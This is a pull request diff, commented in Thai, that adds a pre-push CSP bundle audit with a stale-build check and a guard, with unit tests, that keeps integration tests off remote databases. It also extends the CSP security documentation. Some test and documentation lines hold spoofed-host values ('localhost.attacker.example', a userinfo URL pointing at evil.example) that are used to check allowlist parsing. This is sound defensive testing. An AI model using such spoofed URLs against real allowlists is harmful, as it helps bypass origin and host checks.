### PR TITLE
feat(scripts): gate ตรวจ bundle ว่าไม่มีอะไรชน CSP หลัง enforce

### DIFF
--- a/.gitattributes
+++ b/.gitattributes
@@ -1,3 +1,7 @@
 # Shell scripts ต้องคง LF เสมอ — รันผ่าน Docker/Git Bash, CRLF ทำให้ \r พัง
 *.sh text eol=lf
 Dockerfile* text eol=lf
+# git hooks ไม่มีนามสกุลจึงหลุดกฎ *.sh ข้างบน แล้ว core.autocrlf=true แปลงเป็น CRLF ทั้งไฟล์
+# — bash ที่มากับ git ทนได้ แต่ bash ของ WSL ปฏิเสธ (`syntax error: unexpected end of file`)
+# ซึ่งเป็นสภาพแวดล้อมที่ backend/tests/run.sh ใช้จริงบนเครื่องนี้
+.githooks/* text eol=lf

--- a/.githooks/pre-push
+++ b/.githooks/pre-push
@@ -31,6 +31,19 @@ fi
 echo "[pre-push] script regressions (node --test scripts/tests) ..."
 node --test "${ROOT}"/scripts/tests/*.test.mjs
 
+# CSP bundle audit (issue #113 R2) — เดิม gate นี้อยู่ใน ci-local เท่านั้น ซึ่งไม่มีอะไรบังคับ
+# ให้ใครรัน · Actions ปิด auto-trigger อยู่ hook นี้จึงเป็นที่เดียวที่บังคับได้จริง
+#
+# ตรวจเฉพาะเมื่อมี dist อยู่แล้ว — hook ตัวนี้ตั้งใจให้เบา จึงไม่ build ให้เอง (npm run build
+# ทุกครั้งที่ push แพงเกินไป) · การไม่มี dist ที่นี่ไม่ใช่ "ผ่าน" แต่เป็น "ยังไม่ได้ตรวจ"
+# จึงต้องพิมพ์บอกทั้งสิ่งที่ขาดและวิธีแก้ ไม่ใช่เงียบ (หลักการเดียวกับ differential test)
+if [[ -d "${FRONTEND}/dist" ]]; then
+  echo "[pre-push] CSP bundle audit (frontend/dist) ..."
+  node "${ROOT}/scripts/audit-bundle-csp.mjs"
+else
+  echo "[pre-push] SKIP CSP bundle audit: ไม่มี frontend/dist — build ก่อน (cd frontend && npm run build) แล้ว push ใหม่ถ้าต้องการให้ gate นี้ตรวจ"
+fi
+
 echo "[pre-push] frontend vitest (forks pool from vitest.config.js) ..."
 cd "${FRONTEND}"
 npx vitest run --reporter=dot

--- a/.githooks/pre-push
+++ b/.githooks/pre-push
@@ -29,6 +29,8 @@ fi
 # รันก่อนเพื่อ fail เร็ว และเพราะ Actions ปิด auto-trigger อยู่ hook นี้คือที่เดียวที่
 # gate พวกนี้ถูกบังคับจริงทุกครั้ง (schema parity validator / live header / CSP self-test)
 echo "[pre-push] script regressions (node --test scripts/tests) ..."
+# quote ปิดก่อน `/scripts` โดยตั้งใจ — คลุม `*` ไว้ในเครื่องหมายคำพูดเมื่อไร glob ก็ไม่ขยาย
+# แล้ว node จะได้ path ที่มีดาวจริง ๆ ต่างจากบรรทัด audit ข้างล่างที่ไม่มี glob จึงคลุมทั้ง path ได้
 node --test "${ROOT}"/scripts/tests/*.test.mjs
 
 # CSP bundle audit (issue #113 R2) — เดิม gate นี้อยู่ใน ci-local เท่านั้น ซึ่งไม่มีอะไรบังคับ
@@ -37,11 +39,46 @@ node --test "${ROOT}"/scripts/tests/*.test.mjs
 # ตรวจเฉพาะเมื่อมี dist อยู่แล้ว — hook ตัวนี้ตั้งใจให้เบา จึงไม่ build ให้เอง (npm run build
 # ทุกครั้งที่ push แพงเกินไป) · การไม่มี dist ที่นี่ไม่ใช่ "ผ่าน" แต่เป็น "ยังไม่ได้ตรวจ"
 # จึงต้องพิมพ์บอกทั้งสิ่งที่ขาดและวิธีแก้ ไม่ใช่เงียบ (หลักการเดียวกับ differential test)
-if [[ -d "${FRONTEND}/dist" ]]; then
-  echo "[pre-push] CSP bundle audit (frontend/dist) ..."
-  node "${ROOT}/scripts/audit-bundle-csp.mjs"
+DIST_STAMP="${FRONTEND}/dist/index.html"
+# เช็ก stamp ก่อนเส้นทางอื่น — ของเดิมปล่อย find วิ่งก่อนแล้วค่อยเช็ก [[ -f ]] ซึ่งไม่มีผล
+# กับ find ที่พึ่งรันไปแล้ว (error ของ find ถูกกลืนด้วย 2>/dev/null || true) guard จึงเป็น
+# ของประดับ · ไม่มี dist/index.html คือ "ยังไม่ได้ตรวจ" พิมพ์บอกพร้อมวิธีแก้ ไม่ใช่เงียบ
+if [[ ! -f "${DIST_STAMP}" ]]; then
+  echo "[pre-push] SKIP  csp bundle audit: ไม่มี frontend/dist/index.html — build ก่อน (cd frontend && npm run build) แล้ว push ใหม่ถ้าต้องการให้ gate นี้ตรวจ"
 else
-  echo "[pre-push] SKIP CSP bundle audit: ไม่มี frontend/dist — build ก่อน (cd frontend && npm run build) แล้ว push ใหม่ถ้าต้องการให้ gate นี้ตรวจ"
+  # hook ไม่ build ให้เอง (npm run build ทุกครั้งที่ push แพงเกินไป) dist จึงอาจเก่ากว่าโค้ด
+  # — แต่เตือนเฉพาะเมื่อ **วัดได้ว่าเก่าจริง** ไม่ใช่เตือนทุกครั้ง · คำเตือนที่ดังตลอดเวลาไม่ใช่
+  # สัญญาณ มันสอนให้คนเลิกอ่าน WARN ซึ่งย้อนแย้งกับ gate ที่สร้างมาให้คนเชื่อ
+  # เทียบ mtime ของ source กับ index.html ของ build (ยืนยันแล้วว่าให้ผลสองทางทั้ง Git Bash และ WSL)
+  # ไม่นับไฟล์เทส — vite ไม่เอาเข้า bundle การแก้เทสจึงไม่ทำให้ dist เพี้ยน (วัดแล้ว: ก่อนกรอง
+  # repo นี้เตือนเพราะไฟล์ `__tests__/securityHeaders.test.js` ไฟล์เดียว ซึ่งไม่เกี่ยวกับ bundle เลย)
+  STALE_SRC=""
+  # ไฟล์เดี่ยวที่มีผลกับ bundle โดยตรง เทียบด้วย -nt ตรง ๆ ไม่ต้องปลุก find — index.html
+  # คือ entry ของ vite และ vite.config.js กำหนดตัว build เอง ทั้งคู่ไม่ได้อยู่ใต้ src/ จึง
+  # หลุดจาก find เดิมทั้งที่แก้แล้ว bundle เปลี่ยน
+  for f in index.html vite.config.js; do
+    if [[ "${FRONTEND}/${f}" -nt "${DIST_STAMP}" ]]; then
+      STALE_SRC="frontend/${f}"
+      break
+    fi
+  done
+  # src/ มีอยู่แน่ใน repo นี้ ส่วน public/ เป็นโฟลเดอร์ทางเลือกของ vite (static asset
+  # คัดลอกเข้า dist ตรง ๆ) อาจไม่ถูกสร้าง — find กับโฟลเดอร์ที่ไม่มีคือ error อีกชุดที่ต้อง
+  # กลืนเงียบ ๆ จึงเช็ก -d ก่อน
+  if [[ -z "${STALE_SRC}" ]]; then
+    STALE_SRC="$(find "${FRONTEND}/src" -type f \
+      -not -path '*/__tests__/*' -not -name '*.test.*' -not -name '*.spec.*' \
+      -newer "${DIST_STAMP}" -print -quit 2>/dev/null || true)"
+  fi
+  if [[ -z "${STALE_SRC}" && -d "${FRONTEND}/public" ]]; then
+    STALE_SRC="$(find "${FRONTEND}/public" -type f \
+      -newer "${DIST_STAMP}" -print -quit 2>/dev/null || true)"
+  fi
+  if [[ -n "${STALE_SRC}" ]]; then
+    echo "[pre-push] WARN  csp bundle audit: ${STALE_SRC} ใหม่กว่า dist — ผลนี้เป็นของ build เก่า (cd frontend && npm run build)"
+  fi
+  echo "[pre-push] csp bundle audit (frontend/dist) ..."
+  node "${ROOT}/scripts/audit-bundle-csp.mjs"
 fi
 
 echo "[pre-push] frontend vitest (forks pool from vitest.config.js) ..."

--- a/.gitignore
+++ b/.gitignore
@@ -120,3 +120,5 @@ docs/project-documents/*.docx
 # document-ocr: block sensitive data only (HR documents), allow code
 document-ocr/input/
 document-ocr/output/
+# worktree ของ agent ภายนอก (delegate-cli-agents) — ไม่ใช่ส่วนหนึ่งของ repo
+.worktrees/

--- a/backend/tests/Integration/CspSummaryTest.php
+++ b/backend/tests/Integration/CspSummaryTest.php
@@ -219,10 +219,15 @@ final class CspSummaryTest extends TestCase
      * สร้าง PDO ที่ต่อ MySQL จริงตามปกติ (เหมือน testPdo()) แต่ prepare() ครั้งที่เกิน
      * $succeedCalls จะ throw PDOException — ใช้จำลอง "query ล้มเหลวกลางฟังก์ชัน" แบบปลอดภัย
      * โดยไม่ต้องแตะ schema จริง (ไม่ DROP/RENAME ตาราง — วิธีที่ brief เตือนว่าอันตราย)
+     *
+     * เรียก assertLocalTestDbHost() เองแม้ setUpBeforeClass() จะเรียก testPdo() ไปแล้ว —
+     * ฟังก์ชันนี้ทำสำเนาการอ่าน env ทั้งชุด ความปลอดภัยที่ได้จากลำดับการเรียกจึงเป็นเรื่องบังเอิญ
+     * ที่พังทันทีถ้ามีคนย้าย/เพิ่มทางเข้า (code review M-2)
      */
     private static function buildFlakyPdo(int $succeedCalls): FlakyPreparePdo
     {
         $host   = getenv('MYSQL_HOST') ?: 'db';
+        assertLocalTestDbHost($host);
         $port   = getenv('MYSQL_PORT') ?: '3306';
         $dbname = getenv('MYSQL_DATABASE') ?: 'civil_service_mgmt';
         $user   = getenv('MYSQL_USER') ?: 'root';

--- a/backend/tests/Unit/TestDbHostGuardTest.php
+++ b/backend/tests/Unit/TestDbHostGuardTest.php
@@ -1,0 +1,101 @@
+<?php
+
+declare(strict_types=1);
+
+namespace Tests\Unit;
+
+use PHPUnit\Framework\Attributes\Test;
+use PHPUnit\Framework\TestCase;
+use RuntimeException;
+
+/**
+ * Unit tests สำหรับ assertLocalTestDbHost() ใน tests/bootstrap.php
+ *
+ * บั๊กที่เทสชุดนี้กันไม่ให้กลับมา (code review M-2): เทสใน tests/Integration/ เขียนข้อมูลจริง
+ * และ testPdo() อ่าน MYSQL_HOST จาก env ตรง ๆ — env ที่ชี้ production ค้างอยู่ในเชลล์เดียวกัน
+ * ทำให้ phpunit เขียนลง production ได้โดยไม่มีสัญญาณเตือน
+ *
+ * เทสอยู่ใน Unit suite เพราะ guard ต้องทำงานได้โดยไม่ต้องมี MySQL — และเพราะ Integration
+ * suite ทั้งชุด skip ตัวเองเมื่อต่อ DB ไม่ได้ ซึ่งจะทำให้ guard ไม่เคยถูกตรวจในเครื่องที่ไม่มี DB
+ */
+final class TestDbHostGuardTest extends TestCase
+{
+    private ?string $savedAllowRemote = null;
+
+    protected function setUp(): void
+    {
+        $value = getenv('ALLOW_REMOTE_TEST_DB');
+        $this->savedAllowRemote = $value === false ? null : $value;
+        putenv('ALLOW_REMOTE_TEST_DB');
+    }
+
+    protected function tearDown(): void
+    {
+        if ($this->savedAllowRemote === null) {
+            putenv('ALLOW_REMOTE_TEST_DB');
+        } else {
+            putenv('ALLOW_REMOTE_TEST_DB=' . $this->savedAllowRemote);
+        }
+    }
+
+    /** @return array<string, array{string}> */
+    public static function localHostProvider(): array
+    {
+        return [
+            'docker compose service'   => ['db'],
+            'loopback name'            => ['localhost'],
+            'loopback v4 (ci.yml)'     => ['127.0.0.1'],
+            'loopback v6'              => ['::1'],
+            'run.sh WSL fallback'      => ['host.docker.internal'],
+            'ตัวพิมพ์ใหญ่ต้องผ่านด้วย' => ['LocalHost'],
+            'ช่องว่างหัวท้ายต้องไม่ทำให้พลาด' => [' 127.0.0.1 '],
+        ];
+    }
+
+    #[Test]
+    #[\PHPUnit\Framework\Attributes\DataProvider('localHostProvider')]
+    public function accepts_local_hosts(string $host): void
+    {
+        assertLocalTestDbHost($host);
+        self::assertTrue(true, 'host ในเครื่องต้องผ่านโดยไม่ throw');
+    }
+
+    #[Test]
+    public function rejects_remote_host(): void
+    {
+        $this->expectException(RuntimeException::class);
+        $this->expectExceptionMessageMatches('/ปฏิเสธการต่อ MYSQL_HOST/');
+        assertLocalTestDbHost('gateway01.ap-southeast-1.prod.aws.tidbcloud.com');
+    }
+
+    #[Test]
+    public function rejects_host_that_merely_contains_a_local_name(): void
+    {
+        // เทียบตรงตัว ไม่ใช่ substring — `localhost.attacker.example` ไม่ใช่ของในเครื่อง
+        $this->expectException(RuntimeException::class);
+        assertLocalTestDbHost('localhost.attacker.example');
+    }
+
+    #[Test]
+    public function allows_remote_host_only_with_explicit_opt_in(): void
+    {
+        putenv('ALLOW_REMOTE_TEST_DB=1');
+        assertLocalTestDbHost('gateway01.ap-southeast-1.prod.aws.tidbcloud.com');
+        self::assertTrue(true, 'ตั้ง ALLOW_REMOTE_TEST_DB=1 แล้วต้องผ่าน');
+    }
+
+    #[Test]
+    public function opt_in_must_be_exactly_one(): void
+    {
+        // ค่าอื่นที่ "ดูเหมือนจริง" ต้องไม่ปลดล็อก — ไม่งั้น env ที่หลงเหลือจากงานอื่นจะเปิดช่องให้
+        foreach (['true', 'yes', '0', ''] as $value) {
+            putenv('ALLOW_REMOTE_TEST_DB=' . $value);
+            try {
+                assertLocalTestDbHost('db.production.example');
+                self::fail("ALLOW_REMOTE_TEST_DB={$value} ต้องไม่ปลดล็อก");
+            } catch (RuntimeException) {
+                self::assertTrue(true);
+            }
+        }
+    }
+}

--- a/backend/tests/Unit/TestDbHostGuardTest.php
+++ b/backend/tests/Unit/TestDbHostGuardTest.php
@@ -4,6 +4,7 @@ declare(strict_types=1);
 
 namespace Tests\Unit;
 
+use PHPUnit\Framework\Attributes\DataProvider;
 use PHPUnit\Framework\Attributes\Test;
 use PHPUnit\Framework\TestCase;
 use RuntimeException;
@@ -53,7 +54,7 @@ final class TestDbHostGuardTest extends TestCase
     }
 
     #[Test]
-    #[\PHPUnit\Framework\Attributes\DataProvider('localHostProvider')]
+    #[DataProvider('localHostProvider')]
     public function accepts_local_hosts(string $host): void
     {
         assertLocalTestDbHost($host);

--- a/backend/tests/bootstrap.php
+++ b/backend/tests/bootstrap.php
@@ -28,6 +28,10 @@ require_once __DIR__ . '/../SyncTransformService.php';
  * ค่าที่ทางเข้าทุกทางใช้จริง: `db` (docker compose และ default ของฟังก์ชันนี้) ·
  * `host.docker.internal` (`run.sh` ตอน WSL แยกจาก Docker Desktop) · `127.0.0.1` (ci.yml)
  *
+ * **ข้อจำกัดที่รู้ตัว**: ตรวจแค่ชื่อ host ไม่ได้ตรวจปลายทางจริง — SSH tunnel หรือ port-forward
+ * ที่ทำให้ `127.0.0.1:4000` ชี้ไป TiDB production ยังผ่าน guard นี้ · static check ปิดเรื่องนี้
+ * ไม่ได้โดยธรรมชาติ guard นี้จึงลดความเสี่ยงจาก env ที่หลงเหลือ ไม่ใช่พิสูจน์ว่าปลายทางปลอดภัย
+ *
  * @throws RuntimeException เมื่อ host ไม่ใช่ของในเครื่องและไม่ได้ตั้ง ALLOW_REMOTE_TEST_DB=1
  */
 function assertLocalTestDbHost(string $host): void

--- a/backend/tests/bootstrap.php
+++ b/backend/tests/bootstrap.php
@@ -17,15 +17,50 @@ require_once __DIR__ . '/../ImportService.php';
 require_once __DIR__ . '/../SyncTransformService.php';
 
 /**
+ * ตรวจว่า host ที่ integration test จะต่อเป็น DB ในเครื่อง/ใน CI จริง
+ *
+ * ทำไมต้องมี: เทสใน `tests/Integration/` **เขียนข้อมูลจริง** (INSERT/UPDATE/DELETE เช่น
+ * `AdminSeedUpsertTest` ที่ upsert แถว admin แล้วลบทิ้ง) และ `testPdo()` อ่าน `MYSQL_HOST`
+ * จาก env ตรง ๆ — ถ้าใครมี env ชี้ production ค้างอยู่ในเชลล์เดียวกันแล้วรัน phpunit
+ * เทสจะเขียนลง production **โดยไม่มีสัญญาณเตือนใด ๆ** ซึ่งเป็นความเสี่ยงที่ code review
+ * บันทึกไว้ (M-2) · ต่อไม่ได้ = skip ได้ แต่ต่อ**ผิดที่**ต้องหยุด ไม่ใช่ปล่อยผ่าน
+ *
+ * ค่าที่ทางเข้าทุกทางใช้จริง: `db` (docker compose และ default ของฟังก์ชันนี้) ·
+ * `host.docker.internal` (`run.sh` ตอน WSL แยกจาก Docker Desktop) · `127.0.0.1` (ci.yml)
+ *
+ * @throws RuntimeException เมื่อ host ไม่ใช่ของในเครื่องและไม่ได้ตั้ง ALLOW_REMOTE_TEST_DB=1
+ */
+function assertLocalTestDbHost(string $host): void
+{
+    $localHosts = ['db', 'localhost', '127.0.0.1', '::1', 'host.docker.internal', 'mysql', 'mariadb', 'smartport-db'];
+    if (in_array(strtolower(trim($host)), $localHosts, true)) {
+        return;
+    }
+    if (getenv('ALLOW_REMOTE_TEST_DB') === '1') {
+        return;
+    }
+
+    throw new RuntimeException(
+        "ปฏิเสธการต่อ MYSQL_HOST=\"{$host}\" — integration test เขียนข้อมูลจริง จึงต่อได้เฉพาะ DB "
+        . 'ในเครื่องหรือใน CI เท่านั้น (' . implode(', ', $localHosts) . ') '
+        . 'ถ้าตั้งใจชี้ไป host อื่นจริง ๆ ให้ตั้ง ALLOW_REMOTE_TEST_DB=1 เพื่อให้เห็นชัดว่าเป็นการตัดสินใจ'
+    );
+}
+
+/**
  * สร้าง PDO สำหรับ integration test — อ่าน env เดียวกับ config.php::getDB()
  * แต่ "คืน null แทนการ exit" เมื่อต่อไม่ได้ เพื่อให้ integration test markTestSkipped ได้
  * (unit suite ไม่เรียกฟังก์ชันนี้ → รันได้แม้ไม่มี DB)
+ *
+ * **การต่อไม่ได้กับการต่อผิดที่ถูกแยกกันโดยตั้งใจ**: ต่อไม่ได้คืน null (เทส skip)
+ * ส่วน host ที่ไม่ใช่ของในเครื่อง throw ทันทีตั้งแต่ก่อนเปิด connection
  *
  * @return PDO|null connection หรือ null ถ้าต่อ database ไม่ได้
  */
 function testPdo(): ?PDO
 {
     $host   = getenv('MYSQL_HOST') ?: 'db';
+    assertLocalTestDbHost($host);
     $port   = getenv('MYSQL_PORT') ?: '3306';
     $dbname = getenv('MYSQL_DATABASE') ?: 'civil_service_mgmt';
     $user   = getenv('MYSQL_USER') ?: 'root';

--- a/backend/tests/bootstrap.php
+++ b/backend/tests/bootstrap.php
@@ -27,6 +27,9 @@ require_once __DIR__ . '/../SyncTransformService.php';
  *
  * ค่าที่ทางเข้าทุกทางใช้จริง: `db` (docker compose และ default ของฟังก์ชันนี้) ·
  * `host.docker.internal` (`run.sh` ตอน WSL แยกจาก Docker Desktop) · `127.0.0.1` (ci.yml)
+ * บวก `localhost` / `::1` ที่หมายถึง loopback เดียวกันแต่คนพิมพ์เองบ่อย — **allowlist มีเท่านี้
+ * และตรงกับ `$localHosts` ด้านล่างพอดี** ถ้าเติมค่าใหม่ต้องเติมที่นี่ด้วย ไม่งั้นคอมเมนต์
+ * จะเริ่มโกหกเงียบ ๆ ซึ่งเป็นสิ่งที่ code review รอบนี้จับได้ (ของเดิมอธิบาย 3 แต่โค้ดมี 8)
  *
  * **ข้อจำกัดที่รู้ตัว**: ตรวจแค่ชื่อ host ไม่ได้ตรวจปลายทางจริง — SSH tunnel หรือ port-forward
  * ที่ทำให้ `127.0.0.1:4000` ชี้ไป TiDB production ยังผ่าน guard นี้ · static check ปิดเรื่องนี้
@@ -36,7 +39,11 @@ require_once __DIR__ . '/../SyncTransformService.php';
  */
 function assertLocalTestDbHost(string $host): void
 {
-    $localHosts = ['db', 'localhost', '127.0.0.1', '::1', 'host.docker.internal', 'mysql', 'mariadb', 'smartport-db'];
+    // แคบไว้โดยตั้งใจ: มีเฉพาะค่าที่ทางเข้าจริงใช้ (`db` · `host.docker.internal` · `127.0.0.1`)
+    // บวก loopback รูปอื่นที่หมายถึงเครื่องเดียวกันแน่นอน · ของเดิมมี `mysql`/`mariadb`/
+    // `smartport-db` ติดมาด้วยทั้งที่ไม่มี compose หรือ workflow ไหนใช้ และ data provider
+    // ก็ไม่ครอบ — allowlist ของ guard ด้านความปลอดภัยที่กว้างเกินความจำเป็นคือหนี้ล้วน ๆ
+    $localHosts = ['db', 'localhost', '127.0.0.1', '::1', 'host.docker.internal'];
     if (in_array(strtolower(trim($host)), $localHosts, true)) {
         return;
     }

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -302,6 +302,12 @@ console พิมพ์คำเตือนเสมอไม่ว่า `repo
   — กฎผูกกับ directive จริง ไม่ hardcode: inline script/event handler (`script-src`) · `eval(`
   และ `Function(` (`script-src` — **ข้อจำกัดที่รู้ตัว**: indirect eval แบบ `(0,eval)()` regex
   จับไม่ได้ gate นี้ลดความเสี่ยง ไม่ใช่พิสูจน์ว่าไม่มี)
+  · แท็กถูกแตกด้วยตัวสแกนที่**เคารพ quote แบบ HTML tokenizer** — `>` ในค่า attribute ไม่ปิดแท็ก
+  และชื่อ handler เทียบกับ **ชุดปิดของ event handler content attribute จริง** ไม่ใช่รูป `on`
+  ตามด้วยอะไรก็ได้ เพราะ attribute ชื่อ `onfoo` ที่ไม่ใช่ event จริง browser ไม่ compile
+  เป็นโค้ดตั้งแต่แรก (**ข้อจำกัดที่รู้ตัว**: event ที่ browser เพิ่มในอนาคตจะหลุดจนกว่าจะมีคนเติม
+  — แลกกับการไม่ฟ้อง ` once = true` ในโค้ด JS ปกติ ซึ่งเคยเกิดสามรอบ)
+  · แท็กที่ยาวเกินลิมิตจนอ่าน attribute ไม่ครบ ถูกฟ้องเป็น `unparsable-tag` **ไม่ใช่ข้ามเงียบ ๆ**
   · **URL ที่รู้ว่าถูกเรียกจริง** (argument ของ `fetch()` / `axios` / `XHR.open()` ที่เป็น string
   literal) เทียบกับ **`connect-src` เท่านั้น** — ไม่ใช่ allowlist รวมทุก directive ไม่งั้น origin
   ที่ policy อนุญาตไว้เพื่อโหลดฟอนต์จะกลายเป็นใบผ่านให้ยิง API (ความเสี่ยงข้อ 1 ด้านบน คือ
@@ -309,8 +315,9 @@ console พิมพ์คำเตือนเสมอไม่ว่า `repo
   URL ที่ประกอบจากตัวแปร (`fetch(base + path)`) มองไม่เห็น — allowlist รวมยังคุมสตริงลอยอีกชั้น
   · absolute URL ที่บอกบริบทไม่ได้ เทียบกับ allowlist รวม และรายงาน directive ที่เทียบตาม
   policy จริง โดย **host ถูกตัดสินด้วย URL parser ไม่ใช่ character class** — `_` ในชื่อ host,
-  userinfo (`https://allowed.example@evil.example/`) และ IPv6 literal จึงไม่ทำให้ origin
-  ถูกอ่านผิดเป็นตัวที่ policy อนุญาต · `url()` ภายนอกใน stylesheet **ทุกที่ที่เจอ ไม่ใช่เฉพาะไฟล์ `.css`** (`<style>` ใน HTML และ
+  userinfo ทุกรูป (`https://allowed.example@evil.example/` และรูปที่มี `, ; ( ) { }` คั่น
+  ซึ่งเป็นอักขระที่อยู่ในส่วน userinfo ได้) และ IPv6 literal จึงไม่ทำให้ origin ถูกอ่านผิด
+  เป็นตัวที่ policy อนุญาต · regex ทำหน้าที่แค่คว้าก้อนที่น่าจะเป็น URL เท่านั้น · `url()` ภายนอกใน stylesheet **ทุกที่ที่เจอ ไม่ใช่เฉพาะไฟล์ `.css`** (`<style>` ใน HTML และ
   CSS-in-JS ก็โหลดจริง) **รวมรูป protocol-relative `url(//host/…)`** ซึ่ง browser เติม scheme
   ของหน้าเว็บให้ · เช่นเดียวกับ **ค่าของ attribute ที่เป็น URL** (`src` / `href` / `srcset` /
   `poster` / `data` / `action` / `formaction`) — `<img src="//host">` คือบริบทที่บอกว่าเป็น URL
@@ -321,7 +328,7 @@ console พิมพ์คำเตือนเสมอไม่ว่า `repo
   ด้านบน — ตอนนี้มี gate จับแล้ว ไม่ต้องพึ่งความจำ) · ผ่อน policy แล้วกฎผ่อนตามเอง
   · **fail-closed**: ไม่มี `dist` หรือ `dist` ว่าง = fail ("ยังไม่ได้ตรวจ" ห้ามอ่านเป็น "ตรวจแล้วสะอาด")
   · ไม่ยิงเน็ต ไม่ใช้ Docker · เสียบใน `scripts/ci-local.sh` / `.ps1` หลังขั้น frontend build
-  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (57 เทส ใช้ fixture ใน temp dir ไม่แตะ
+  · regression: `scripts/tests/audit-bundle-csp.test.mjs` (62 เทส ใช้ fixture ใน temp dir ไม่แตะ
   `frontend/dist` จริง) ซึ่ง `.githooks/pre-push` รันให้อยู่แล้วผ่าน glob
 - ตรวจจากภายนอกหลัง deploy:
   ```bash

--- a/docs/frontend-security-headers.md
+++ b/docs/frontend-security-headers.md
@@ -270,6 +270,79 @@ console พิมพ์คำเตือนเสมอไม่ว่า `repo
 2. `font-src https://fonts.gstatic.com` ไม่มี `'self'` — วันนี้ไม่พังเพราะไม่มี font ใน
    bundle แต่ถ้าย้ายมา self-host font เมื่อไร จะพังทันทีทั้งที่ดูเหมือนแค่เปลี่ยน asset
 
+### Evidence check 2026-08-22 — console ถูกดูแล้ว และมี write path เป็นครั้งแรก
+
+รอบนี้ปิดสองช่องว่างที่ 21 ส.ค. ระบุว่าเหลืออยู่: **ไม่มีใครเคยดู console** และ
+**ไม่เคยมี POST/PUT/DELETE เลยสักครั้ง**
+
+| หลักฐาน | ผล | วิธีได้มา |
+|---|---|---|
+| console ของ DevTools ระหว่างไล่เมนู | **เงียบทุกหน้า — ไม่มี CSP warning สักครั้ง** | Chrome **151** ขับผ่าน DevTools protocol ไล่ 18 route หลังล็อกอิน + หน้า login (19 หน้า) อ่าน console ทุกหน้า |
+| ทราฟฟิกที่เขียนข้อมูลจริง | **POST/PUT ที่เขียนข้อมูล 5 นัด ผ่านทั้งหมด** (ไม่นับ login · ดูตารางล่าง) | สร้าง/แก้/ปิดใช้งานรายการทดสอบผ่าน UI จริง |
+| CSP report ที่ browser ยิงเอง | **0 ครั้ง** — ไม่มี request ชนิด `cspviolationreport` ในทุกหน้า | filter network ตาม resource type |
+| build ที่ production เสิร์ฟ | `assets/index-B1YyXcfC.js` — **แฮชเดิม** ตั้งแต่ 16–17 ส.ค. | network log ของหน้าแรก |
+| header สด | CSP ตรงกับ `render.yaml` ทุก directive · **ยังเป็น report-only ไม่มี enforce header** | `HEAD /` |
+
+**19 หน้าที่ไล่ครบ (18 route หลังล็อกอิน + หน้า login)** — `/login` · `/dashboard` · `/personnel` · `/profile` · `/profile/{id}` ·
+`/probation-end` · `/candidates/general` · `/time-counting` · `/time-multiplier` ·
+`/royal-decorations` · `/retirement-report` · `/admin` · `/work-results` · `/awards` ·
+`/import` · `/ocr` · `/users` · `/audit` · `/settings/special-areas`
+(รวมสี่หน้าที่ 21 ส.ค. ระบุว่ายังไม่เคยทดสอบ: Dashboard · `/admin` · `/import` · `/ocr`)
+
+**write path ที่ทดสอบจริง**
+
+| # | request | ผล |
+|---|---|---|
+| 1 | `POST /api/auth/login` | 200 |
+| 2 | `POST /api/personnel` | **201** — สร้างรายการทดสอบ |
+| 3 | `PUT /api/personnel/{id}` | 200 — แก้ field แล้วเห็นผลในตาราง |
+| 4 | `PUT /api/personnel/{id}` | 200 — ปิดใช้งาน (soft delete) |
+| 5 | `POST /api/multiplier/areas` | **201** — สร้าง master data ทดสอบ |
+| 6 | `PUT /api/multiplier/areas/{id}/status` | 200 — ปิดใช้งาน |
+
+**ทำไม console สำคัญกว่าการอ่าน log** — browser ที่ใช้คือ Chrome 151 ซึ่งเป็นเวอร์ชันเดียวกับที่
+รอบ 21 ส.ค. กังวลว่าอาจเลิกส่ง `report-uri` แล้ว · ถ้าเป็นเช่นนั้นจริง "log ว่าง" จะไม่ได้แปลว่า
+ไม่มี violation แต่ console พิมพ์คำเตือนเสมอไม่ว่ากลไก report จะทำงานหรือไม่ — **รอบนี้จึงเป็น
+หลักฐานตรงที่ไม่ต้องพึ่ง pipeline ของ report เลย**
+
+**ยังไม่ยืนยัน — เขียนไว้ให้เด่นเท่ากับสิ่งที่ยืนยันแล้ว**
+
+1. **`img-src` ยังไม่เคยถูกใช้งานจริงสักครั้ง** — ทั้งระบบไม่มีรูปข้าราชการแม้แต่ใบเดียว
+   (โปรไฟล์แสดง placeholder icon เป็น inline SVG) และฟอร์มเพิ่มบุคลากรไม่มีช่องอัปโหลดรูป
+   จึงยังไม่มีทางทดสอบเส้นทาง `apiAssetUrl()` ได้จาก UI · directive นี้คือครึ่งหนึ่งของความเสี่ยง
+   ข้อ 1 ข้างบน — **"ไม่รู้" ไม่ใช่ "สะอาด"**
+2. **`/import` และ `/ocr` ทดสอบแค่การเปิดหน้า** ทั้งคู่รอผู้ใช้เลือกไฟล์ก่อนจึงยิง request
+   จึงยังไม่มีหลักฐานของเส้นทาง upload · หน้า `/ocr` render ปกติ ยืนยันว่าอาการพังของมัน
+   ไม่ได้มาจาก CSP (ตรงกับที่ issue #147 วินิจฉัยไว้)
+
+**ข้อค้นพบที่ขัดกับรอบ 21 ส.ค.: `verify-live-headers.mjs` วันนี้ FAIL**
+
+hashed asset ตอบ `public, max-age=31536000, immutable` แต่ `render.yaml` ประกาศ `no-cache`
+กฎเดียวทั้ง site มาตั้งแต่ `c168000` (17 ส.ค.) ซึ่ง**ลบกฎ `path: /assets/*` ทิ้งไปแล้ว**
+
+วัดซ้ำเพื่อแยกว่าเป็นค่าแกว่ง (ที่คอมเมนต์ใน `render.yaml` บันทึกไว้ว่า ~90/10) หรือของค้าง:
+
+```
+GET /assets/index-B1YyXcfC.js  → 12/12  public, max-age=31536000, immutable
+GET /                          →  8/8   no-cache
+```
+
+**deterministic ทั้งคู่ ไม่แกว่งเลย** — อ่านตรง ๆ ได้ว่า live service ยังถือกฎที่ถูกลบออกจาก
+`render.yaml` ไปแล้ว ขณะที่การ**แก้ค่า** CSP (เพิ่ม `object-src 'none'` เมื่อ 16 ส.ค.) propagate
+เรียบร้อย · สมมติฐานที่ตรงกับข้อมูลคือ **การลบ header rule ไม่ propagate ส่วนการแก้ค่า propagate**
+แต่ยังฟันธงกลไกของ Render ไม่ได้จากการวัดครั้งเดียว
+
+**ผลต่อวันตัดสินใจ enforce:** การ enforce คือการเปลี่ยนชื่อ header
+(`Content-Security-Policy-Report-Only` → `Content-Security-Policy`) = **ลบ rule เก่า + เพิ่ม rule ใหม่**
+ถ้าครึ่งแรกไม่เกิดขึ้นจริง หลัง deploy จะได้ทั้งสอง header พร้อมกัน และในกรณีที่แย่กว่านั้นคือ
